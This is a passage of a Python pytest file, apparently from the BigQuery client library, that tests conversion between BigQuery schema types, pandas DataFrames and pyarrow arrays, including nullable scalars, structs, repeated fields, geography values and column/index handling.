PANDAS_MINIUM_VERSION = pkg_resources.parse_version("1.0.0")
if pandas is not None:
PANDAS_INSTALLED_VERSION = pkg_resources.get_distribution("pandas").parsed_version
else:
# Set to less than MIN version.
PANDAS_INSTALLED_VERSION = pkg_resources.parse_version("0.0.0")
@pytest.fixture
def module_under_test():
from google.cloud.bigquery import _pandas_helpers
return _pandas_helpers
def is_none(value):
return value is None
def is_datetime(type_):
# See: https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#datetime-type
return all_(
pyarrow.types.is_timestamp,
lambda type_: type_.unit == "us",
lambda type_: type_.tz is None,
)(type_)
def is_numeric(type_):
# See: https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#numeric-type
return all_(
pyarrow.types.is_decimal,
lambda type_: type_.precision == 38,
lambda type_: type_.scale == 9,
)(type_)
def is_bignumeric(type_):
# See: https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#numeric-type
return all_(
pyarrow.types.is_decimal,
lambda type_: type_.precision == 76,
lambda type_: type_.scale == 38,
)(type_)
def is_timestamp(type_):
# See: https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#timestamp-type
return all_(
pyarrow.types.is_timestamp,
lambda type_: type_.unit == "us",
lambda type_: type_.tz == "UTC",
)(type_)
def do_all(functions, value):
return all((func(value) for func in functions))
def all_(*functions):
return functools.partial(do_all, functions)
def test_is_datetime():
assert is_datetime(pyarrow.timestamp("us", tz=None))
assert not is_datetime(pyarrow.timestamp("ms", tz=None))
assert not is_datetime(pyarrow.timestamp("us", tz="UTC"))
assert not is_datetime(pyarrow.timestamp("ns", tz="UTC"))
assert not is_datetime(pyarrow.string())
def test_do_all():
assert do_all((lambda _: True, lambda _: True), None)
assert not do_all((lambda _: True, lambda _: False), None)
assert not do_all((lambda _: False,), None)
def test_all_():
assert all_(lambda _: True, lambda _: True)(None)
assert not all_(lambda _: True, lambda _: False)(None)
@pytest.mark.parametrize(
"bq_type,bq_mode,is_correct_type",
[
("STRING", "NULLABLE", pyarrow.types.is_string),
("STRING", None, pyarrow.types.is_string),
("string", "NULLABLE", pyarrow.types.is_string),
("StRiNg", "NULLABLE", pyarrow.types.is_string),
("BYTES", "NULLABLE", pyarrow.types.is_binary),
("INTEGER", "NULLABLE", pyarrow.types.is_int64),
("INT64", "NULLABLE", pyarrow.types.is_int64),
("FLOAT", "NULLABLE", pyarrow.types.is_float64),
("FLOAT64", "NULLABLE", pyarrow.types.is_float64),
("NUMERIC", "NULLABLE", is_numeric),
("BIGNUMERIC", "NULLABLE", is_bignumeric),
("BOOLEAN", "NULLABLE", pyarrow.types.is_boolean),
("BOOL", "NULLABLE", pyarrow.types.is_boolean),
("TIMESTAMP", "NULLABLE", is_timestamp),
("DATE", "NULLABLE", pyarrow.types.is_date32),
("TIME", "NULLABLE", pyarrow.types.is_time64),
("DATETIME", "NULLABLE", is_datetime),
("GEOGRAPHY", "NULLABLE", pyarrow.types.is_string),
("UNKNOWN_TYPE", "NULLABLE", is_none),
# Use pyarrow.list_(item_type) for repeated (array) fields.
(
"STRING",
"REPEATED",
all_(
pyarrow.types.is_list,
lambda type_: pyarrow.types.is_string(type_.value_type),
),
),
(
"STRING",
"repeated",
all_(
pyarrow.types.is_list,
lambda type_: pyarrow.types.is_string(type_.value_type),
),
),
(
"STRING",
"RePeAtEd",
all_(
pyarrow.types.is_list,
lambda type_: pyarrow.types.is_string(type_.value_type),
),
),
(
"BYTES",
"REPEATED",
all_(
pyarrow.types.is_list,
lambda type_: pyarrow.types.is_binary(type_.value_type),
),
),
(
"INTEGER",
"REPEATED",
all_(
pyarrow.types.is_list,
lambda type_: pyarrow.types.is_int64(type_.value_type),
),
),
(
"INT64",
"REPEATED",
all_(
pyarrow.types.is_list,
lambda type_: pyarrow.types.is_int64(type_.value_type),
),
),
(
"FLOAT",
"REPEATED",
all_(
pyarrow.types.is_list,
lambda type_: pyarrow.types.is_float64(type_.value_type),
),
),
(
"FLOAT64",
"REPEATED",
all_(
pyarrow.types.is_list,
lambda type_: pyarrow.types.is_float64(type_.value_type),
),
),
(
"NUMERIC",
"REPEATED",
all_(pyarrow.types.is_list, lambda type_: is_numeric(type_.value_type)),
),
(
"BIGNUMERIC",
"REPEATED",
all_(pyarrow.types.is_list, lambda type_: is_bignumeric(type_.value_type)),
),
(
"BOOLEAN",
"REPEATED",
all_(
pyarrow.types.is_list,
lambda type_: pyarrow.types.is_boolean(type_.value_type),
),
),
(
"BOOL",
"REPEATED",
all_(
pyarrow.types.is_list,
lambda type_: pyarrow.types.is_boolean(type_.value_type),
),
),
(
"TIMESTAMP",
"REPEATED",
all_(pyarrow.types.is_list, lambda type_: is_timestamp(type_.value_type)),
),
(
"DATE",
"REPEATED",
all_(
pyarrow.types.is_list,
lambda type_: pyarrow.types.is_date32(type_.value_type),
),
),
(
"TIME",
"REPEATED",
all_(
pyarrow.types.is_list,
lambda type_: pyarrow.types.is_time64(type_.value_type),
),
),
(
"DATETIME",
"REPEATED",
all_(pyarrow.types.is_list, lambda type_: is_datetime(type_.value_type)),
),
(
"GEOGRAPHY",
"REPEATED",
all_(
pyarrow.types.is_list,
lambda type_: pyarrow.types.is_string(type_.value_type),
),
),
("RECORD", "REPEATED", is_none),
("UNKNOWN_TYPE", "REPEATED", is_none),
],
)
def test_bq_to_arrow_data_type(module_under_test, bq_type, bq_mode, is_correct_type):
field = schema.SchemaField("ignored_name", bq_type, mode=bq_mode)
actual = module_under_test.bq_to_arrow_data_type(field)
assert is_correct_type(actual)
@pytest.mark.parametrize("bq_type", ["RECORD", "record", "STRUCT", "struct"])
def test_bq_to_arrow_data_type_w_struct(module_under_test, bq_type):
fields = (
schema.SchemaField("field01", "STRING"),
schema.SchemaField("field02", "BYTES"),
schema.SchemaField("field03", "INTEGER"),
schema.SchemaField("field04", "INT64"),
schema.SchemaField("field05", "FLOAT"),
schema.SchemaField("field06", "FLOAT64"),
schema.SchemaField("field07", "NUMERIC"),
schema.SchemaField("field08", "BIGNUMERIC"),
schema.SchemaField("field09", "BOOLEAN"),
schema.SchemaField("field10", "BOOL"),
schema.SchemaField("field11", "TIMESTAMP"),
schema.SchemaField("field12", "DATE"),
schema.SchemaField("field13", "TIME"),
schema.SchemaField("field14", "DATETIME"),
schema.SchemaField("field15", "GEOGRAPHY"),
)
field = schema.SchemaField("ignored_name", bq_type, mode="NULLABLE", fields=fields)
actual = module_under_test.bq_to_arrow_data_type(field)
expected = (
pyarrow.field("field01", pyarrow.string()),
pyarrow.field("field02", pyarrow.binary()),
pyarrow.field("field03", pyarrow.int64()),
pyarrow.field("field04", pyarrow.int64()),
pyarrow.field("field05", pyarrow.float64()),
pyarrow.field("field06", pyarrow.float64()),
pyarrow.field("field07", module_under_test.pyarrow_numeric()),
pyarrow.field("field08", module_under_test.pyarrow_bignumeric()),
pyarrow.field("field09", pyarrow.bool_()),
pyarrow.field("field10", pyarrow.bool_()),
pyarrow.field("field11", module_under_test.pyarrow_timestamp()),
pyarrow.field("field12", pyarrow.date32()),
pyarrow.field("field13", module_under_test.pyarrow_time()),
pyarrow.field("field14", module_under_test.pyarrow_datetime()),
pyarrow.field("field15", pyarrow.string()),
)
expected = pyarrow.struct(expected)
assert pyarrow.types.is_struct(actual)
assert actual.num_fields == len(fields)
assert actual.equals(expected)
@pytest.mark.parametrize("bq_type", ["RECORD", "record", "STRUCT", "struct"])
def test_bq_to_arrow_data_type_w_array_struct(module_under_test, bq_type):
fields = (
schema.SchemaField("field01", "STRING"),
schema.SchemaField("field02", "BYTES"),
schema.SchemaField("field03", "INTEGER"),
schema.SchemaField("field04", "INT64"),
schema.SchemaField("field05", "FLOAT"),
schema.SchemaField("field06", "FLOAT64"),
schema.SchemaField("field07", "NUMERIC"),
schema.SchemaField("field08", "BIGNUMERIC"),
schema.SchemaField("field09", "BOOLEAN"),
schema.SchemaField("field10", "BOOL"),
schema.SchemaField("field11", "TIMESTAMP"),
schema.SchemaField("field12", "DATE"),
schema.SchemaField("field13", "TIME"),
schema.SchemaField("field14", "DATETIME"),
schema.SchemaField("field15", "GEOGRAPHY"),
)
field = schema.SchemaField("ignored_name", bq_type, mode="REPEATED", fields=fields)
actual = module_under_test.bq_to_arrow_data_type(field)
expected = (
pyarrow.field("field01", pyarrow.string()),
pyarrow.field("field02", pyarrow.binary()),
pyarrow.field("field03", pyarrow.int64()),
pyarrow.field("field04", pyarrow.int64()),
pyarrow.field("field05", pyarrow.float64()),
pyarrow.field("field06", pyarrow.float64()),
pyarrow.field("field07", module_under_test.pyarrow_numeric()),
pyarrow.field("field08", module_under_test.pyarrow_bignumeric()),
pyarrow.field("field09", pyarrow.bool_()),
pyarrow.field("field10", pyarrow.bool_()),
pyarrow.field("field11", module_under_test.pyarrow_timestamp()),
pyarrow.field("field12", pyarrow.date32()),
pyarrow.field("field13", module_under_test.pyarrow_time()),
pyarrow.field("field14", module_under_test.pyarrow_datetime()),
pyarrow.field("field15", pyarrow.string()),
)
expected_value_type = pyarrow.struct(expected)
assert pyarrow.types.is_list(actual)
assert pyarrow.types.is_struct(actual.value_type)
assert actual.value_type.num_fields == len(fields)
assert actual.value_type.equals(expected_value_type)
def test_bq_to_arrow_data_type_w_struct_unknown_subfield(module_under_test):
fields = (
schema.SchemaField("field1", "STRING"),
schema.SchemaField("field2", "INTEGER"),
# Don't know what to convert UNKNOWN_TYPE to, let type inference work,
# instead.
schema.SchemaField("field3", "UNKNOWN_TYPE"),
)
field = schema.SchemaField("ignored_name", "RECORD", mode="NULLABLE", fields=fields)
with warnings.catch_warnings(record=True) as warned:
actual = module_under_test.bq_to_arrow_data_type(field)
assert actual is None
assert len(warned) == 1
warning = warned[0]
assert "field3" in str(warning)
@pytest.mark.parametrize(
"bq_type,rows",
[
("STRING", ["abc", None, "def", None]),
("BYTES", [b"abc", None, b"def", None]),
("INTEGER", [123, None, 456, None]),
("INT64", [-9223372036854775808, None, 9223372036854775807, 123]),
("FLOAT", [1.25, None, 3.5, None]),
(
"NUMERIC",
[
decimal.Decimal("-99999999999999999999999999999.999999999"),
None,
decimal.Decimal("99999999999999999999999999999.999999999"),
decimal.Decimal("999.123456789"),
],
),
(
"BIGNUMERIC",
[
decimal.Decimal("-{d38}.{d38}".format(d38="9" * 38)),
None,
decimal.Decimal("{d38}.{d38}".format(d38="9" * 38)),
decimal.Decimal("3.141592653589793238462643383279"),
],
),
("BOOLEAN", [True, None, False, None]),
("BOOL", [False, None, True, None]),
(
"TIMESTAMP",
[
datetime.datetime(1, 1, 1, 0, 0, 0, tzinfo=datetime.timezone.utc),
None,
datetime.datetime(
9999, 12, 31, 23, 59, 59, 999999, tzinfo=datetime.timezone.utc
),
datetime.datetime(1970, 1, 1, 0, 0, 0, tzinfo=datetime.timezone.utc),
],
),
(
"DATE",
[
datetime.date(1, 1, 1),
None,
datetime.date(9999, 12, 31),
datetime.date(1970, 1, 1),
],
),
(
"TIME",
[
datetime.time(0, 0, 0),
None,
datetime.time(23, 59, 59, 999999),
datetime.time(12, 0, 0),
],
),
(
"DATETIME",
[
datetime.datetime(1, 1, 1, 0, 0, 0),
datetime.datetime(9999, 12, 31, 23, 59, 59, 999999),
None,
datetime.datetime(1970, 1, 1, 0, 0, 0),
datetime.datetime(1999, 3, 14, 15, 9, 26, 535898),
],
),
(
"GEOGRAPHY",
[
"POINT(30 10)",
None,
"LINESTRING (30 10, 10 30, 40 40)",
"POLYGON ((30 10, 40 40, 20 40, 10 20, 30 10))",
],
),
],
)
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_bq_to_arrow_array_w_nullable_scalars(module_under_test, bq_type, rows):
series = pandas.Series(rows, dtype="object")
bq_field = schema.SchemaField("field_name", bq_type)
arrow_array = module_under_test.bq_to_arrow_array(series, bq_field)
roundtrip = arrow_array.to_pylist()
assert rows == roundtrip
@pytest.mark.parametrize(
"bq_type,rows",
[
(
"TIMESTAMP",
[
"1971-09-28T23:59:07+00:00",
"1975-04-09T23:59:02+00:00",
"1979-08-17T23:59:05+00:00",
"NaT",
"1983-05-09T13:00:00+00:00",
],
),
(
"DATETIME",
[
"1971-09-28T23:59:07",
"1975-04-09T23:59:02",
"1979-08-17T23:59:05",
"NaT",
"1983-05-09T13:00:00",
],
),
],
)
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_bq_to_arrow_array_w_pandas_timestamp(module_under_test, bq_type, rows):
rows = [pandas.Timestamp(row) for row in rows]
series = pandas.Series(rows)
bq_field = schema.SchemaField("field_name", bq_type)
arrow_array = module_under_test.bq_to_arrow_array(series, bq_field)
roundtrip = arrow_array.to_pandas()
assert series.equals(roundtrip)
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_bq_to_arrow_array_w_arrays(module_under_test):
rows = [[1, 2, 3], [], [4, 5, 6]]
series = pandas.Series(rows, dtype="object")
bq_field = schema.SchemaField("field_name", "INTEGER", mode="REPEATED")
arrow_array = module_under_test.bq_to_arrow_array(series, bq_field)
roundtrip = arrow_array.to_pylist()
assert rows == roundtrip
@pytest.mark.parametrize("bq_type", ["RECORD", "record", "STRUCT", "struct"])
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_bq_to_arrow_array_w_structs(module_under_test, bq_type):
rows = [
{"int_col": 123, "string_col": "abc"},
None,
{"int_col": 456, "string_col": "def"},
]
series = pandas.Series(rows, dtype="object")
bq_field = schema.SchemaField(
"field_name",
bq_type,
fields=(
schema.SchemaField("int_col", "INTEGER"),
schema.SchemaField("string_col", "STRING"),
),
)
arrow_array = module_under_test.bq_to_arrow_array(series, bq_field)
roundtrip = arrow_array.to_pylist()
assert rows == roundtrip
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_bq_to_arrow_array_w_special_floats(module_under_test):
bq_field = schema.SchemaField("field_name", "FLOAT64")
rows = [float("-inf"), float("nan"), float("inf"), None]
series = pandas.Series(rows, dtype="object")
arrow_array = module_under_test.bq_to_arrow_array(series, bq_field)
roundtrip = arrow_array.to_pylist()
assert len(rows) == len(roundtrip)
assert roundtrip[0] == float("-inf")
# Since we are converting from pandas, NaN is treated as NULL in pyarrow
# due to pandas conventions.
# https://arrow.apache.org/docs/python/data.html#none-values-and-nan-handling
assert roundtrip[1] is None
assert roundtrip[2] == float("inf")
assert roundtrip[3] is None
@pytest.mark.skipif(geopandas is None, reason="Requires `geopandas`")
def test_bq_to_arrow_array_w_geography_dtype(module_under_test):
from shapely import wkb, wkt
bq_field = schema.SchemaField("field_name", "GEOGRAPHY")
series = geopandas.GeoSeries([None, wkt.loads("point(0 0)")])
array = module_under_test.bq_to_arrow_array(series, bq_field)
# The result is binary, because we use wkb format
assert array.type == pyarrow.binary()
assert array.to_pylist() == [None, wkb.dumps(series[1])]
# All na:
series = geopandas.GeoSeries([None, None])
array = module_under_test.bq_to_arrow_array(series, bq_field)
assert array.type == pyarrow.string()
assert array.to_pylist() == list(series)
@pytest.mark.skipif(geopandas is None, reason="Requires `geopandas`")
def test_bq_to_arrow_array_w_geography_type_shapely_data(module_under_test):
from shapely import wkb, wkt
bq_field = schema.SchemaField("field_name", "GEOGRAPHY")
series = pandas.Series([None, wkt.loads("point(0 0)")])
array = module_under_test.bq_to_arrow_array(series, bq_field)
# The result is binary, because we use wkb format
assert array.type == pyarrow.binary()
assert array.to_pylist() == [None, wkb.dumps(series[1])]
# All na:
series = pandas.Series([None, None])
array = module_under_test.bq_to_arrow_array(series, bq_field)
assert array.type == pyarrow.string()
assert array.to_pylist() == list(series)
@pytest.mark.skipif(geopandas is None, reason="Requires `geopandas`")
def test_bq_to_arrow_array_w_geography_type_wkb_data(module_under_test):
from shapely import wkb, wkt
bq_field = schema.SchemaField("field_name", "GEOGRAPHY")
series = pandas.Series([None, wkb.dumps(wkt.loads("point(0 0)"))])
array = module_under_test.bq_to_arrow_array(series, bq_field)
# The result is binary, because we use wkb format
assert array.type == pyarrow.binary()
assert array.to_pylist() == list(series)
def test_bq_to_arrow_schema_w_unknown_type(module_under_test):
fields = (
schema.SchemaField("field1", "STRING"),
schema.SchemaField("field2", "INTEGER"),
# Don't know what to convert UNKNOWN_TYPE to, let type inference work,
# instead.
schema.SchemaField("field3", "UNKNOWN_TYPE"),
)
with warnings.catch_warnings(record=True) as warned:
actual = module_under_test.bq_to_arrow_schema(fields)
assert actual is None
assert len(warned) == 1
warning = warned[0]
assert "field3" in str(warning)
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_get_column_or_index_not_found(module_under_test):
dataframe = pandas.DataFrame({"not_the_column_youre_looking_for": [1, 2, 3]})
with pytest.raises(ValueError, match="col_is_missing"):
module_under_test.get_column_or_index(dataframe, "col_is_missing")
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_get_column_or_index_with_multiindex_not_found(module_under_test):
dataframe = pandas.DataFrame(
{"column_name": [1, 2, 3, 4, 5, 6]},
index=pandas.MultiIndex.from_tuples(
[("a", 0), ("a", 1), ("b", 0), ("b", 1), ("c", 0), ("c", 1)]
),
)
with pytest.raises(ValueError, match="not_in_df"):
module_under_test.get_column_or_index(dataframe, "not_in_df")
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_get_column_or_index_with_both_prefers_column(module_under_test):
dataframe = pandas.DataFrame(
{"some_name": [1, 2, 3]}, index=pandas.Index([0, 1, 2], name="some_name")
)
series = module_under_test.get_column_or_index(dataframe, "some_name")
expected = pandas.Series([1, 2, 3], name="some_name")
pandas.testing.assert_series_equal(series, expected)
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_get_column_or_index_with_column(module_under_test):
dataframe = pandas.DataFrame({"column_name": [1, 2, 3], "other_column": [4, 5, 6]})
series = module_under_test.get_column_or_index(dataframe, "column_name")
expected = pandas.Series([1, 2, 3], name="column_name")
pandas.testing.assert_series_equal(series, expected)
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_get_column_or_index_with_named_index(module_under_test):
dataframe = pandas.DataFrame(
{"column_name": [1, 2, 3]}, index=pandas.Index([4, 5, 6], name="index_name")
)
series = module_under_test.get_column_or_index(dataframe, "index_name")
expected = pandas.Series([4, 5, 6], name="index_name")
pandas.testing.assert_series_equal(series, expected)
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_get_column_or_index_with_datetimeindex(module_under_test):
datetimes = [
datetime.datetime(2000, 1, 2, 3, 4, 5, 101),
datetime.datetime(2006, 7, 8, 9, 10, 11, 202),
datetime.datetime(2012, 1, 14, 15, 16, 17, 303),
]
dataframe = pandas.DataFrame(
{"column_name": [1, 2, 3]},
index=pandas.DatetimeIndex(datetimes, name="index_name"),
)
series = module_under_test.get_column_or_index(dataframe, "index_name")
expected = pandas.Series(datetimes, name="index_name")
pandas.testing.assert_series_equal(series, expected)
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_get_column_or_index_with_multiindex(module_under_test):
dataframe = pandas.DataFrame(
{"column_name": [1, 2, 3, 4, 5, 6]},
index=pandas.MultiIndex.from_tuples(
[("a", 0), ("a", 1), ("b", 0), ("b", 1), ("c", 0), ("c", 1)],
names=["letters", "numbers"],
),
)
series = module_under_test.get_column_or_index(dataframe, "letters")
expected = pandas.Series(["a", "a", "b", "b", "c", "c"], name="letters")
pandas.testing.assert_series_equal(series, expected)
series = module_under_test.get_column_or_index(dataframe, "numbers")
expected = pandas.Series([0, 1, 0, 1, 0, 1], name="numbers")
pandas.testing.assert_series_equal(series, expected)
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_list_columns_and_indexes_without_named_index(module_under_test):
df_data = collections.OrderedDict(
[
("a_series", [1, 2, 3, 4]),
("b_series", [0.1, 0.2, 0.3, 0.4]),
("c_series", ["a", "b", "c", "d"]),
]
)
dataframe = pandas.DataFrame(df_data)
columns_and_indexes = module_under_test.list_columns_and_indexes(dataframe)
expected = [
("a_series", pandas.api.types.pandas_dtype("int64")),
("b_series", pandas.api.types.pandas_dtype("float64")),
("c_series", pandas.api.types.pandas_dtype("object")),
]
assert columns_and_indexes == expected
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_list_columns_and_indexes_with_named_index_same_as_column_name(
module_under_test,
):
df_data = collections.OrderedDict(
[
("a_series", [1, 2, 3, 4]),
("b_series", [0.1, 0.2, 0.3, 0.4]),
("c_series", ["a", "b", "c", "d"]),
]
)
dataframe = pandas.DataFrame(
df_data,
# Use same name as an integer column but a different datatype so that
# we can verify that the column is listed but the index isn't.
index=pandas.Index([0.1, 0.2, 0.3, 0.4], name="a_series"),
)
columns_and_indexes = module_under_test.list_columns_and_indexes(dataframe)
expected = [
("a_series", pandas.api.types.pandas_dtype("int64")),
("b_series", pandas.api.types.pandas_dtype("float64")),
("c_series", pandas.api.types.pandas_dtype("object")),
]
assert columns_and_indexes == expected
@pytest.mark.skipif(
pandas is None or PANDAS_INSTALLED_VERSION < PANDAS_MINIUM_VERSION,
reason="Requires `pandas version >= 1.0.0` which introduces pandas.NA",
)
def test_dataframe_to_json_generator(module_under_test):
utcnow = datetime.datetime.utcnow()
df_data = collections.OrderedDict(
[
("a_series", [pandas.NA, 2, 3, 4]),
("b_series", [0.1, float("NaN"), 0.3, 0.4]),
("c_series", ["a", "b", pandas.NA, "d"]),
("d_series", [utcnow, utcnow, utcnow, pandas.NaT]),
("e_series", [True, False, True, None]),
]
)
dataframe = pandas.DataFrame(
df_data, index=pandas.Index([4, 5, 6, 7], name="a_index")
)
dataframe = dataframe.astype({"a_series": pandas.Int64Dtype()})
rows = module_under_test.dataframe_to_json_generator(dataframe)
expected = [
{"b_series": 0.1, "c_series": "a", "d_series": utcnow, "e_series": True},
{"a_series": 2, "c_series": "b", "d_series": utcnow, "e_series": False},
{"a_series": 3, "b_series": 0.3, "d_series": utcnow, "e_series": True},
{"a_series": 4, "b_series": 0.4, "c_series": "d"},
]
assert list(rows) == expected
def test_dataframe_to_json_generator_repeated_field(module_under_test):
pytest.importorskip(
"pandas",
minversion=str(PANDAS_MINIUM_VERSION),
reason=(
f"Requires `pandas version >= {PANDAS_MINIUM_VERSION}` "
"which introduces pandas.NA"
),
)
df_data = [
collections.OrderedDict(
[("repeated_col", [pandas.NA, 2, None, 4]), ("not_repeated_col", "first")]
),
collections.OrderedDict(
[
("repeated_col", ["a", "b", mock.sentinel.foo, "d"]),
("not_repeated_col", "second"),
]
),
]
dataframe = pandas.DataFrame(df_data)
rows = module_under_test.dataframe_to_json_generator(dataframe)
expected = [
{"repeated_col": [pandas.NA, 2, None, 4], "not_repeated_col": "first"},
{
"repeated_col": ["a", "b", mock.sentinel.foo, "d"],
"not_repeated_col": "second",
},
]
assert list(rows) == expected
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_list_columns_and_indexes_with_named_index(module_under_test):
df_data = collections.OrderedDict(
[
("a_series", [1, 2, 3, 4]),
("b_series", [0.1, 0.2, 0.3, 0.4]),
("c_series", ["a", "b", "c", "d"]),
]
)
dataframe = pandas.DataFrame(
df_data, index=pandas.Index([4, 5, 6, 7], name="a_index")
)
columns_and_indexes = module_under_test.list_columns_and_indexes(dataframe)
expected = [
("a_index", pandas.api.types.pandas_dtype("int64")),
("a_series", pandas.api.types.pandas_dtype("int64")),
("b_series", pandas.api.types.pandas_dtype("float64")),
("c_series", pandas.api.types.pandas_dtype("object")),
]
assert columns_and_indexes == expected
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_list_columns_and_indexes_with_multiindex(module_under_test):
df_data = collections.OrderedDict(
[
("a_series", [1, 2, 3, 4]),
("b_series", [0.1, 0.2, 0.3, 0.4]),
("c_series", ["a", "b", "c", "d"]),
]
)
dataframe = pandas.DataFrame(
df_data,
index=pandas.MultiIndex.from_tuples(
[(0, 0, 41), (0, 0, 42), (1, 0, 41), (1, 1, 41)],
names=[
"a_index",
# Use same name as column, but different dtype so we can verify
# the column type is included.
"b_series",
"c_index",
],
),
)
columns_and_indexes = module_under_test.list_columns_and_indexes(dataframe)
expected = [
("a_index", pandas.api.types.pandas_dtype("int64")),
("c_index", pandas.api.types.pandas_dtype("int64")),
("a_series", pandas.api.types.pandas_dtype("int64")),
("b_series", pandas.api.types.pandas_dtype("float64")),
("c_series", pandas.api.types.pandas_dtype("object")),
]
assert columns_and_indexes == expected
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_dataframe_to_bq_schema_dict_sequence(module_under_test):
df_data = collections.OrderedDict(
[
("str_column", ["hello", "world"]),
("int_column", [42, 8]),
("bool_column", [True, False]),
]
)
dataframe = pandas.DataFrame(df_data)
dict_schema = [
{"name": "str_column", "type": "STRING", "mode": "NULLABLE"},
{"name": "bool_column", "type": "BOOL", "mode": "REQUIRED"},
]
returned_schema = module_under_test.dataframe_to_bq_schema(dataframe, dict_schema)
expected_schema = (
schema.SchemaField("str_column", "STRING", "NULLABLE"),
schema.SchemaField("int_column", "INTEGER", "NULLABLE"),
schema.SchemaField("bool_column", "BOOL", "REQUIRED"),
)
assert returned_schema == expected_schema
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_dataframe_to_arrow_with_multiindex(module_under_test):
bq_schema = (
schema.SchemaField("str_index", "STRING"),
# int_index is intentionally omitted, to verify that it's okay to be
# missing indexes from the schema.
schema.SchemaField("dt_index", "DATETIME"),
schema.SchemaField("int_col", "INTEGER"),
schema.SchemaField("nullable_int_col", "INTEGER"),
schema.SchemaField("str_col", "STRING"),
)
df_data = collections.OrderedDict(
[
("int_col", [1, 2, 3, 4, 5, 6]),
("nullable_int_col", [6.0, float("nan"), 7.0, float("nan"), 8.0, 9.0]),
("str_col", ["apple", "banana", "cherry", "durian", "etrog", "fig"]),
]
)
df_index = pandas.MultiIndex.from_tuples(
[
("a", 0, datetime.datetime(1999, 12, 31, 23, 59, 59, 999999)),
("a", 0, datetime.datetime(2000, 1, 1, 0, 0, 0)),
("a", 1, datetime.datetime(1999, 12, 31, 23, 59, 59, 999999)),
("b", 1, datetime.datetime(2000, 1, 1, 0, 0, 0)),
("b", 0, datetime.datetime(1999, 12, 31, 23, 59, 59, 999999)),
("b", 0, datetime.datetime(2000, 1, 1, 0, 0, 0)),
],
names=["str_index", "int_index", "dt_index"],
)
dataframe = pandas.DataFrame(df_data, index=df_index)
arrow_table = module_under_test.dataframe_to_arrow(dataframe, bq_schema)
assert arrow_table.schema.names == [
"str_index",
"dt_index",
"int_col",
"nullable_int_col",
"str_col",
]
arrow_data = arrow_table.to_pydict()
assert arrow_data["str_index"] == ["a", "a", "a", "b", "b", "b"]
expected_dt_index = [
pandas.Timestamp(dt)
for dt in (
datetime.datetime(1999, 12, 31, 23, 59, 59, 999999),
datetime.datetime(2000, 1, 1, 0, 0, 0),
datetime.datetime(1999, 12, 31, 23, 59, 59, 999999),
datetime.datetime(2000, 1, 1, 0, 0, 0),
datetime.datetime(1999, 12, 31, 23, 59, 59, 999999),
datetime.datetime(2000, 1, 1, 0, 0, 0),
)
]
assert arrow_data["dt_index"] == expected_dt_index
assert arrow_data["int_col"] == [1, 2, 3, 4, 5, 6]
assert arrow_data["nullable_int_col"] == [6, None, 7, None, 8, 9]
assert arrow_data["str_col"] == [
"apple",
"banana",
"cherry",
"durian",
"etrog",
"fig",
]
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_dataframe_to_arrow_with_required_fields(module_under_test):
bq_schema = (
schema.SchemaField("field01", "STRING", mode="REQUIRED"),
schema.SchemaField("field02", "BYTES", mode="REQUIRED"),
schema.SchemaField("field03", "INTEGER", mode="REQUIRED"),
schema.SchemaField("field04", "INT64", mode="REQUIRED"),
schema.SchemaField("field05", "FLOAT", mode="REQUIRED"),
schema.SchemaField("field06", "FLOAT64", mode="REQUIRED"),
schema.SchemaField("field07", "NUMERIC", mode="REQUIRED"),
schema.SchemaField("field08", "BIGNUMERIC", mode="REQUIRED"),
schema.SchemaField("field09", "BOOLEAN", mode="REQUIRED"),
schema.SchemaField("field10", "BOOL", mode="REQUIRED"),
schema.SchemaField("field11", "TIMESTAMP", mode="REQUIRED"),
schema.SchemaField("field12", "DATE", mode="REQUIRED"),
schema.SchemaField("field13", "TIME", mode="REQUIRED"),
schema.SchemaField("field14", "DATETIME", mode="REQUIRED"),
schema.SchemaField("field15", "GEOGRAPHY", mode="REQUIRED"),
)
data = {
"field01": ["hello", "world"],
"field02": [b"abd", b"efg"],
"field03": [1, 2],
"field04": [3, 4],
"field05": [1.25, 9.75],
"field06": [-1.75, -3.5],
"field07": [decimal.Decimal("1.2345"), decimal.Decimal("6.7891")],
"field08": [
decimal.Decimal("-{d38}.{d38}".format(d38="9" * 38)),
decimal.Decimal("{d38}.{d38}".format(d38="9" * 38)),
],
"field09": [True, False],
"field10": [False, True],
"field11": [
datetime.datetime(1970, 1, 1, 0, 0, 0, tzinfo=datetime.timezone.utc),
datetime.datetime(2012, 12, 21, 9, 7, 42, tzinfo=datetime.timezone.utc),
],
"field12": [datetime.date(9999, 12, 31), datetime.date(1970, 1, 1)],
"field13": [datetime.time(23, 59, 59, 999999), datetime.time(12, 0, 0)],
"field14": [
datetime.datetime(1970, 1, 1, 0, 0, 0),
datetime.datetime(2012, 12, 21, 9, 7, 42),
],
"field15": ["POINT(30 10)", "POLYGON ((30 10, 40 40, 20 40, 10 20, 30 10))"],
}
dataframe = pandas.DataFrame(data)
arrow_table = module_under_test.dataframe_to_arrow(dataframe, bq_schema)
arrow_schema = arrow_table.schema
assert len(arrow_schema) == len(bq_schema)
for arrow_field in arrow_schema:
assert not arrow_field.nullable
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_dataframe_to_arrow_with_unknown_type(module_under_test):
bq_schema = (
schema.SchemaField("field00", "UNKNOWN_TYPE"),
